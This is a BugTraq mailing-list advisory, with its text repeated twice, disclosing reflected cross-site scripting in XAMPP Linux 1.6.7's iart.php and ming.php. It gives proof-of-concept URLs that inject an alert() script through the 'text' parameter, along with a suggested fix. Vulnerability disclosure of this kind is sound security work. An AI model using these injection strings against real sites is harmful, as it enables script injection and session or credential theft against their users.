BugTraq
Back to list
|
Post reply
Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities
Aug 04 2008 02:13PM
irancrash gmail com
----------------------------------------------------------------
Program : Xampp Linux 1.6.7
Type : Multiple Cross Site Scripting Vulnerabilities
Alert : Medium
----------------------------------------------------------------
Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar
.gz
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Cross Site Scripting Vulnerabilities :
Vulnerability work when register_globals set as on .
http://Example.com/xampp/iart.php?text=">><<>>"''<script>alert(document.
alert)</script>
http://Example.com/xampp/ming.php?text=">><<>>"''<script>alert(document.
alert)</script>
Solution : Remove xampp folder or filter text variable with htmlspecialchars() function ....
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Program : Xampp Linux 1.6.7
Type : Multiple Cross Site Scripting Vulnerabilities
Alert : Medium
----------------------------------------------------------------
Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar
.gz
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Cross Site Scripting Vulnerabilities :
Vulnerability work when register_globals set as on .
http://Example.com/xampp/iart.php?text=">><<>>"''<script>alert(document.
alert)</script>
http://Example.com/xampp/ming.php?text=">><<>>"''<script>alert(document.
alert)</script>
Solution : Remove xampp folder or filter text variable with htmlspecialchars() function ....
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
[ reply ]